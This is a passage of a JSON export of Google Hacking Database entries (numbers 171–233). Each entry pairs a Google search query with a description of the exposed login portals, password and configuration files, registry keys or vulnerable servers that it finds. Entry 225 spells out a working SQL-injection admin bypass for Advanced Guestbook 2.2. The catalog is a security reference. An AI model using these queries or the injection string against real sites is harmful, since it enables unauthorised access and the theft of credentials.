        "textualDescription": "These pages reveal server information such as port, server software version, server name, full paths, etc."
    }, 
    {
        "signatureReferenceNumber": "171", 
        "link": "https://www.exploit-db.com/ghdb/171/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache+Installation%22", 
        "shortDescription": "intitle:\"Test Page for Apache\"", 
        "textualDescription": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."
    }, 
    {
        "signatureReferenceNumber": "172", 
        "link": "https://www.exploit-db.com/ghdb/172/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Alogin%2Easp", 
        "shortDescription": "inurl:login.asp", 
        "textualDescription": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention."
    }, 
    {
        "signatureReferenceNumber": "173", 
        "link": "https://www.exploit-db.com/ghdb/173/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2Fadmin%2Flogin.asp+", 
        "shortDescription": "inurl:/admin/login.asp", 
        "textualDescription": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention."
    }, 
    {
        "signatureReferenceNumber": "174", 
        "link": "https://www.exploit-db.com/ghdb/174/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Running+in+Child+mode%22+", 
        "shortDescription": "\"Running in Child mode\"", 
        "textualDescription": "This is a gnutella client that was picked up by google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions."
    }, 
    {
        "signatureReferenceNumber": "175", 
        "link": "https://www.exploit-db.com/ghdb/175/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22This+is+a+Shareaza+Node%22", 
        "shortDescription": "\"This is a Shareaza Node\"", 
        "textualDescription": "These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime."
    }, 
    {
        "signatureReferenceNumber": "176", 
        "link": "https://www.exploit-db.com/ghdb/176/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22VNC+Desktop%22+inurl%3A5800", 
        "shortDescription": "\"VNC Desktop\" inurl:5800", 
        "textualDescription": "VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of VNC can be important to an attacker, as is the open port of 5800."
    }, 
    {
        "signatureReferenceNumber": "177", 
        "link": "https://www.exploit-db.com/ghdb/177/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22index+of+cgi%2Dbin%22", 
        "shortDescription": "\"index of cgi-bin\"", 
        "textualDescription": "CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful."
    }, 
    {
        "signatureReferenceNumber": "178", 
        "link": "https://www.exploit-db.com/ghdb/178/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3ASnap.Server+inurl%3AFunc%3D", 
        "shortDescription": "intitle:Snap.Server inurl:Func=", 
        "textualDescription": "This page reveals the existance of a SNAP server (Netowrk attached server or NAS devices) Depending on the configuration, these servers may be vulnerable, but regardless the existance of this server is useful for information gathering."
    }, 
    {
        "signatureReferenceNumber": "179", 
        "link": "https://www.exploit-db.com/ghdb/179/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aserver%2Dstatus+%22apache%22", 
        "shortDescription": "inurl:server-status \"apache\"", 
        "textualDescription": "This page shows all sort of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc."
    }, 
    {
        "signatureReferenceNumber": "180", 
        "link": "https://www.exploit-db.com/ghdb/180/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser+user", 
        "shortDescription": "eggdrop filetype:user user", 
        "textualDescription": "These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users."
    }, 
    {
        "signatureReferenceNumber": "181", 
        "link": "https://www.exploit-db.com/ghdb/181/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=intitle:%22index+of%22+intext:connect.inc+&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N", 
        "shortDescription": "intitle:\"index of\" intext:connect.inc", 
        "textualDescription": "These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted."
    }, 
    {
        "signatureReferenceNumber": "182", 
        "link": "https://www.exploit-db.com/ghdb/182/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22MikroTik+RouterOS+Managing+Webpage%22+", 
        "shortDescription": "intitle:\"MikroTik RouterOS Managing Webpage\"", 
        "textualDescription": "This is the front page entry point to a \"Mikro Tik\" Router."
    }, 
    {
        "signatureReferenceNumber": "183", 
        "link": "https://www.exploit-db.com/ghdb/183/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Afcgi-bin%2Fecho", 
        "shortDescription": "inurl:fcgi-bin/echo", 
        "textualDescription": "This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!"
    }, 
    {
        "signatureReferenceNumber": "184", 
        "link": "https://www.exploit-db.com/ghdb/184/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Acgi-bin%2Fprintenv", 
        "shortDescription": "inurl:cgi-bin/printenv", 
        "textualDescription": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more."
    }, 
    {
        "signatureReferenceNumber": "185", 
        "link": "https://www.exploit-db.com/ghdb/185/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Execution+of+this+script+not+permitted%22+Contact+phone", 
        "shortDescription": "intitle:\"Execution of this script not permitted\"", 
        "textualDescription": "This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel."
    }, 
    {
        "signatureReferenceNumber": "186", 
        "link": "https://www.exploit-db.com/ghdb/186/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aperl%2Fprintenv", 
        "shortDescription": "inurl:perl/printenv", 
        "textualDescription": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more."
    }, 
    {
        "signatureReferenceNumber": "187", 
        "link": "https://www.exploit-db.com/ghdb/187/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aj2ee%2Fexamples%2Fjsp", 
        "shortDescription": "inurl:j2ee/examples/jsp", 
        "textualDescription": "This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server."
    }, 
    {
        "signatureReferenceNumber": "188", 
        "link": "https://www.exploit-db.com/ghdb/188/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aojspdemos", 
        "shortDescription": "inurl:ojspdemos", 
        "textualDescription": "This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server."
    }, 
    {
        "signatureReferenceNumber": "189", 
        "link": "https://www.exploit-db.com/ghdb/189/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aserver-info+%22Apache+Server+Information%22", 
        "shortDescription": "inurl:server-info \"Apache Server Information\"", 
        "textualDescription": "This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more...."
    }, 
    {
        "signatureReferenceNumber": "190", 
        "link": "https://www.exploit-db.com/ghdb/190/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Apls%2Fadmin_%2Fgateway.htm+", 
        "shortDescription": "inurl:pls/admin_/gateway.htm", 
        "textualDescription": "This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine it's version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited can lead to unauthorized privileges to the databse. In addition, this page may allow unauthorized modification of parameters on the server."
    }, 
    {
        "signatureReferenceNumber": "191", 
        "link": "https://www.exploit-db.com/ghdb/191/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=inurl:/pls/sample/admin_/help/&hl=en&lr=&ie=UTF-8&oe=UTF-8&filter=0", 
        "shortDescription": "inurl:/pls/sample/admin_/help/", 
        "textualDescription": "This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack."
    }, 
    {
        "signatureReferenceNumber": "192", 
        "link": "https://www.exploit-db.com/ghdb/192/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Gateway+Configuration+Menu%22", 
        "shortDescription": "intitle:\"Gateway Configuration Menu\"", 
        "textualDescription": "This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query."
    }, 
    {
        "signatureReferenceNumber": "193", 
        "link": "https://www.exploit-db.com/ghdb/193/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3ARemote.Desktop.Web.Connection+inurl%3Atsweb", 
        "shortDescription": "intitle:\"Remote Desktop Web Connection\" inurl:tsweb", 
        "textualDescription": "This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanisms for an attacker."
    }, 
    {
        "signatureReferenceNumber": "194", 
        "link": "https://www.exploit-db.com/ghdb/194/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aphp+inurl%3Ahlstats+intext%3A%22Server+Username%22", 
        "shortDescription": "inurl:php inurl:hlstats intext:\"Server Username\"", 
        "textualDescription": "This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems."
    }, 
    {
        "signatureReferenceNumber": "195", 
        "link": "https://www.exploit-db.com/ghdb/195/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intext%3A%22Tobias+Oetiker%22+%22traffic+analysis%22", 
        "shortDescription": "intext:\"Tobias Oetiker\" \"traffic analysis\"", 
        "textualDescription": "This is the MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network."
    }, 
    {
        "signatureReferenceNumber": "196", 
        "link": "https://www.exploit-db.com/ghdb/196/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Atdbin", 
        "shortDescription": "inurl:tdbin", 
        "textualDescription": "This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible."
    }, 
    {
        "signatureReferenceNumber": "197", 
        "link": "https://www.exploit-db.com/ghdb/197/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=Google+for%3A+%2Bintext%3A%22webalizer%22+%2Bintext%3A%22Total+Usernames%22+%2Bintext%3A%22Usage+Statistics+for%22", 
        "shortDescription": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", 
        "textualDescription": "The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack."
    }, 
    {
        "signatureReferenceNumber": "198", 
        "link": "https://www.exploit-db.com/ghdb/198/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aperform+filetype%3Aini&btnG=Search", 
        "shortDescription": "inurl:perform filetype:ini", 
        "textualDescription": "Displays the perform.ini file used by the popular irc client mIRC. Often times has channel passwords and/or login passwords for nickserv."
    }, 
    {
        "signatureReferenceNumber": "199", 
        "link": "https://www.exploit-db.com/ghdb/199/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=nl&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index+of%22+intext%3Aglobals.inc&lr=", 
        "shortDescription": "intitle:\"index of\" intext:globals.inc", 
        "textualDescription": "contains plaintext user/pass for mysql database"
    }, 
    {
        "signatureReferenceNumber": "200", 
        "link": "https://www.exploit-db.com/ghdb/200/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Apdf+%22Assessment+Report%22+nessus", 
        "shortDescription": "filetype:pdf \"Assessment Report\" nessus", 
        "textualDescription": "These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow."
    }, 
    {
        "signatureReferenceNumber": "201", 
        "link": "https://www.exploit-db.com/ghdb/201/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22smb.conf%22+intext%3A%22workgroup%22+filetype%3Aconf+conf", 
        "shortDescription": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf conf", 
        "textualDescription": "These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network."
    }, 
    {
        "signatureReferenceNumber": "202", 
        "link": "https://www.exploit-db.com/ghdb/202/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Samba+Web+Administration+Tool%22+intext%3A%22Help+Workgroup%22", 
        "shortDescription": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", 
        "textualDescription": "This search reveals wide-open samba web adminitration servers. Attackers can change options on the server."
    }, 
    {
        "signatureReferenceNumber": "203", 
        "link": "https://www.exploit-db.com/ghdb/203/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Aproperties+inurl%3Adb+intext%3Apassword", 
        "shortDescription": "filetype:properties inurl:db intext:password", 
        "textualDescription": "The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating."
    }, 
    {
        "signatureReferenceNumber": "204", 
        "link": "https://www.exploit-db.com/ghdb/204/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Anames.nsf%3Fopendatabase", 
        "shortDescription": "inurl:names.nsf?opendatabase", 
        "textualDescription": "A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server."
    }, 
    {
        "signatureReferenceNumber": "205", 
        "link": "https://www.exploit-db.com/ghdb/205/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22index+of%22+inurl%3Arecycler", 
        "shortDescription": "\"index of\" inurl:recycler", 
        "textualDescription": "This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways."
    }, 
    {
        "signatureReferenceNumber": "206", 
        "link": "https://www.exploit-db.com/ghdb/206/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Aconf+inurl%3Afirewall+-intitle%3Acvs", 
        "shortDescription": "filetype:conf inurl:firewall -intitle:cvs", 
        "textualDescription": "These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes."
    }, 
    {
        "signatureReferenceNumber": "207", 
        "link": "https://www.exploit-db.com/ghdb/207/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=filetype%3Ainc+intext%3Amysql_connect", 
        "shortDescription": "filetype:inc intext:mysql_connect", 
        "textualDescription": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases.  Very dangerous stuff.  The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database."
    }, 
    {
        "signatureReferenceNumber": "208", 
        "link": "https://www.exploit-db.com/ghdb/208/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22HTTP_FROM%3Dgooglebot%22++googlebot.com+%22Server_Software%3D%22", 
        "shortDescription": "\"HTTP_FROM=googlebot\"  googlebot.com \"Server_Software=\"", 
        "textualDescription": "These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site."
    }, 
    {
        "signatureReferenceNumber": "209", 
        "link": "https://www.exploit-db.com/ghdb/209/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Request+Details%22+%22Control+Tree%22+%22Server+Variables%22", 
        "shortDescription": "\"Request Details\" \"Control Tree\" \"Server Variables\"", 
        "textualDescription": "These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets."
    }, 
    {
        "signatureReferenceNumber": "210", 
        "link": "https://www.exploit-db.com/ghdb/210/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+%2Bintext%3A%22defaultusername%22+%2Bintext%3A%22defaultpassword%22", 
        "shortDescription": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", 
        "textualDescription": "These pages display windows registry keys which reveal passwords and/or usernames."
    }, 
    {
        "signatureReferenceNumber": "211", 
        "link": "https://www.exploit-db.com/ghdb/211/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&q=inurl%3Ametaframexp%2Fdefault%2Flogin.asp+%7C+intitle%3A%22Metaframe+XP+Login%22", 
        "shortDescription": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", 
        "textualDescription": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site."
    }, 
    {
        "signatureReferenceNumber": "212", 
        "link": "https://www.exploit-db.com/ghdb/212/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2FCitrix%2FNfuse17%2F+", 
        "shortDescription": "inurl:/Citrix/Nfuse17/", 
        "textualDescription": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site."
    }, 
    {
        "signatureReferenceNumber": "213", 
        "link": "https://www.exploit-db.com/ghdb/213/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Awab+wab+", 
        "shortDescription": "filetype:wab wab", 
        "textualDescription": "These are Microsoft Outlook Mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information."
    }, 
    {
        "signatureReferenceNumber": "214", 
        "link": "https://www.exploit-db.com/ghdb/214/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+HKEY_CURRENT_USER+username", 
        "shortDescription": "filetype:reg reg HKEY_CURRENT_USER username", 
        "textualDescription": "This search finds registry files from the Windows Operating system. Considered the \"soul\" of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords."
    }, 
    {
        "signatureReferenceNumber": "215", 
        "link": "https://www.exploit-db.com/ghdb/215/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+HKEY_CURRENT_USER+SSHHOSTKEYS+", 
        "shortDescription": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", 
        "textualDescription": "This search reveals SSH host key fro the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and shows sensitive information such as the SSH host key in use by that client."
    }, 
    {
        "signatureReferenceNumber": "216", 
        "link": "https://www.exploit-db.com/ghdb/216/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2Ftmp+", 
        "shortDescription": "inurl:/tmp", 
        "textualDescription": "Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign."
    }, 
    {
        "signatureReferenceNumber": "217", 
        "link": "https://www.exploit-db.com/ghdb/217/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=filetype:mbx+mbx+intext:Subject&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N", 
        "shortDescription": "filetype:mbx mbx intext:Subject", 
        "textualDescription": "These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files."
    }, 
    {
        "signatureReferenceNumber": "218", 
        "link": "https://www.exploit-db.com/ghdb/218/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle:%22eMule+*%22+intitle:%22-+Web+Control+Panel%22+intext:%22Web+Control+Panel%22+%22Enter+your+password+here.%22&num=100&hl=en&lr=&c2coff=1&filter=0", 
        "shortDescription": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", 
        "textualDescription": "This iks the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)"
    }, 
    {
        "signatureReferenceNumber": "219", 
        "link": "https://www.exploit-db.com/ghdb/219/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22webadmin%22+filetype%3Ansf", 
        "shortDescription": "inurl:\"webadmin\" filetype:nsf", 
        "textualDescription": "This is a standard login page for Domino Web Administration."
    }, 
    {
        "signatureReferenceNumber": "220", 
        "link": "https://www.exploit-db.com/ghdb/220/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Areg+reg+%2Bintext%3A%22internet+account+manager", 
        "shortDescription": "filetype:reg reg +intext:\"internet account manager\"", 
        "textualDescription": "This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases."
    }, 
    {
        "signatureReferenceNumber": "221", 
        "link": "https://www.exploit-db.com/ghdb/221/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Aeml+eml+%2Bintext%3A%22Subject%22+%2Bintext%3A%22From%22+%2Bintext%3A%22To%22", 
        "shortDescription": "filetype:eml eml +intext:\"Subject\" +intext:\"From\" +intext:\"To\"", 
        "textualDescription": "These are oulook express email files which contain emails, with full  headers. The information in these emails can be useful for information gathering about a target."
    }, 
    {
        "signatureReferenceNumber": "222", 
        "link": "https://www.exploit-db.com/ghdb/222/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&q=inurl%3Avtund.conf+intext%3Apass+-cvs", 
        "shortDescription": "inurl:vtund.conf intext:pass -cvs", 
        "textualDescription": "Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site."
    }, 
    {
        "signatureReferenceNumber": "223", 
        "link": "https://www.exploit-db.com/ghdb/223/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Alogin+filetype%3Aswf+swf", 
        "shortDescription": "inurl:login filetype:swf swf", 
        "textualDescription": "This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file."
    }, 
    {
        "signatureReferenceNumber": "224", 
        "link": "https://www.exploit-db.com/ghdb/224/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Aurl+%2Binurl%3A%22ftp%3A%2F%2F%22++%2Binurl%3A%22@%22", 
        "shortDescription": "filetype:url +inurl:\"ftp://\"  +inurl:\"@\"", 
        "textualDescription": "These are FTP Bookmarks, some of which contain plaintext login names and passwords."
    }, 
    {
        "signatureReferenceNumber": "225", 
        "link": "https://www.exploit-db.com/ghdb/225/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=intitle%3Aguestbook+%22advanced+guestbook+2.2+powered%22", 
        "shortDescription": "intitle:guestbook \"advanced guestbook 2.2 powered\"", 
        "textualDescription": "Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit \"Admin\" then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209"
    }, 
    {
        "signatureReferenceNumber": "226", 
        "link": "https://www.exploit-db.com/ghdb/226/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle:%22300+multiple+choices%22+intext:server.at&hl=en&lr=&ie=UTF-8&start=90&sa=N", 
        "shortDescription": "intitle:\"300 multiple choices\"", 
        "textualDescription": "This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system."
    }, 
    {
        "signatureReferenceNumber": "227", 
        "link": "https://www.exploit-db.com/ghdb/227/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22index+of%22+mysql.conf+OR+mysql_config", 
        "shortDescription": "intitle:\"index of\" mysql.conf OR mysql_config", 
        "textualDescription": "This file contains port number, version number and path info to MySQL server."
    }, 
    {
        "signatureReferenceNumber": "228", 
        "link": "https://www.exploit-db.com/ghdb/228/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Alic+lic+intext%3Akey&btnG=Search", 
        "shortDescription": "filetype:lic lic intext:key", 
        "textualDescription": "License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file."
    }, 
    {
        "signatureReferenceNumber": "229", 
        "link": "https://www.exploit-db.com/ghdb/229/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22please+log+in%22", 
        "shortDescription": "\"please log in\"", 
        "textualDescription": "This is a simple search for a login page. Attackers view login pages as the \"front door\" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site."
    }, 
    {
        "signatureReferenceNumber": "230", 
        "link": "https://www.exploit-db.com/ghdb/230/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+username+putty", 
        "shortDescription": "filetype:log username putty", 
        "textualDescription": "These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to."
    }, 
    {
        "signatureReferenceNumber": "231", 
        "link": "https://www.exploit-db.com/ghdb/231/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3A%22password.log%22", 
        "shortDescription": "filetype:log inurl:\"password.log\"", 
        "textualDescription": "These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user."
    }, 
    {
        "signatureReferenceNumber": "232", 
        "link": "https://www.exploit-db.com/ghdb/232/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Dell+Remote+Access+Controller%22", 
        "shortDescription": "intitle:\"Dell Remote Access Controller\"", 
        "textualDescription": "This is the Dell Remote Access Controller that allows remote administration of a Dell server."
    }, 
    {
        "signatureReferenceNumber": "233", 
        "link": "https://www.exploit-db.com/ghdb/233/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Avsd+vsd+network+-samples+-examples&btnG=Search", 
        "shortDescription": "filetype:vsd vsd network -samples -examples", 
